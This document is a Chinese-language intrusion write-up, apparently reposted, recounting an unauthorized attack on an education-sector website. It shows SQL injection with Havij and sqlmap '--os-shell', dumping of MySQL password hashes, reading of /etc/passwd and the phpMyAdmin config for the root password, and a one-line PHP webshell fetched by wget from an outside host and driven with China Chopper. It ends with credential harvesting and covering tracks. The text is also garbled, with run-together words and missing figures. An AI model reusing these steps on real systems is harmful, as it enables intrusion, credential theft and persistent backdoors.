0x00信息收集

无意中发现了个注入链接，到底怎么发现的我也不知道，反正不是扫的。

http://www.2cto.com /xxxxxx?id=12

谷歌找到后台

site:f4ck.edu.cninurl:admin

http://www.2cto.com /xxx/xxx.php

0x01账号密码获取

先利用注入点。

丢进Havij跑出数据库

跑出数据库账号密码

如图

破解admin密码失败，如图

然后破解其他的用户，获得密码为123xxxxx登陆后，无可以利用地方，如

查看其他的超级管理员，密码都没有破解成功，其中一个cmd5显示破解成功，但需购买，但

实际是即使购买，它会提示没法破解。我擦。如图

继续。看见mysql

读取账号密码信息，又发现了phpmyadmin

先读取mysql的用户密码信息

 

Data

Found:

User=xxx

 

Data

Data

Data

Data

Data

Found:

Found:

Found:

Found:

Found:

Password=*3A3DAA719C86DA543FF1A9E27DB6E59xxxxxxxxx

User=pku_xxx

Password=*3EDC2D4C98204DC580FCE638B8B3FA7xxxxxxxxx

User=root

Password=*EF9C0D7D80D1B158F3958176F869AAC9xxxxxxxx

查root密码时候又是提示购买，要购买时又提示无法解密。Fuck啊。

 

0x02转战phpmyadmin

后台传shell无望，转战phpmyadmin

在网站后添加phpmyadmin如图

输了几个常用的账号密码没结果。再看看那个读文件的功能

如图，可以读出/etc/passwd文件的内容

如图G-7

 

之后就是看看能能知道默认的配置文件，依据服务器信息如图G-8，判断是Apache之后填写

默认的安装目录，默认的默认配置文件，

读/etc/issue获得操作系统Ubuntu10.10\n\l

读/usr/local/apache/conf/httpd.conf失败

读/usr/local/apache/conf/httpd.conf失败

工具都提示Iamidle....。

然后就继续打算猜目录了，phpmyadmin爆路径，但都没爆出，这个phpmyadmin貌似有点怪。

然后Google

site:www.2cto.com warning:

site:www.2cto.com error:

也没搞到。然后就是拼人品。

 

0x03发现xampp

user

听着《第一首情歌》，继续。

忽然看到那个phpmyadmin的登陆界面中有

然后搜索获得xampp默认安装信息如图G-9

xamppuser

如图f的那样。

File/Directory

Purpose

/opt/lampp/bin/

/opt/lampp/htdocs/

/opt/lampp/etc/httpd.con

f/opt/lampp/etc/my.cnf

 

/opt/lampp/etc/php.ini

/opt/lampp/etc/proftpd.c

onf

/opt/lampp/phpmyadmin/co

nfig.inc.php

TheXAMPPcommandshome./opt/lampp/bin/mysqlcallsfor

exampletheMySQLmonitor.

TheApacheDocumentRootdirectory.

TheApacheconfigurationfile.

TheMySQLconfigurationfile.

ThePHPconfigurationfile.

TheProFTPDconfigurationfile.(since0.9.5)

ThephpMyAdminconfigurationfile.

读文件

读/opt/lampp/phpmyadmin/config.inc.php

获得信息如图G-10

 

$cfg['Servers'][$i]['user']

='root';

$cfg['Servers'][$i]['password']

='91xxxx';

不过它的亮点是commentskey啦啦啦。。

果断连接phpmyadmin，然后我擦哇，输入没反应，这个是个啥子情况。

然后继续读文件，看能读到配置文件不。

读/opt/lampp/htdocs/index.php

找到配置文件，

如图G-11

第60页共633页

继续读/opt/lampp/htdocs/inc/conn.php

没密码哇哈哈。

之后可以写一句话木马文件进去，但是pangolin没写入。

Itsaidthetargetmustsetmagic_quotes_gpctooff

执行数据库查询语句

select''intooutfile'/opt/lampp/htdocs/fuck.php'

失败

 

0x04拿起Sqlmap

然后想起了sqlmap它弹个shell出来。

命令：sqlmap.py-u"http://www.2cto.com /xxx.php?id=12"--os-shell

输入web路径/opt/lampp/htdocs/之后弹出的shell，如图G-12

查看whoami

如图G-13

lscat命令可以执行cdvi等命令都没法执行

列目录时输入ls/则命令成功

之后发现可以利用wget命令，但是很明显弱智了，直接wgethttp://fuck.uk/a.php额。。

然后直接wget

Cata.txt

结果为

http://fuck.uk/a.txt

之后，发现没法重命名，试了下，wget个rar文件，然后解压也不行。额。。其实cp

可以执行的，直接cpa.txta.php就成功啦。菜刀连接，失败。。Fuck。。。。

之后看了下一句话

 

而如果php设置文件中的

和mv是

short_open_tag是open的话才可以使用

重新wget之后如图

G-14

?>

所以最好用

eval($_request[fuck])?>

菜刀连接如图G-15

Ok....提权啥子的先不搞了。

 

0x05敏感信息收集

搜索各种账号密码信息，清理痕迹

suggestion

no suggestion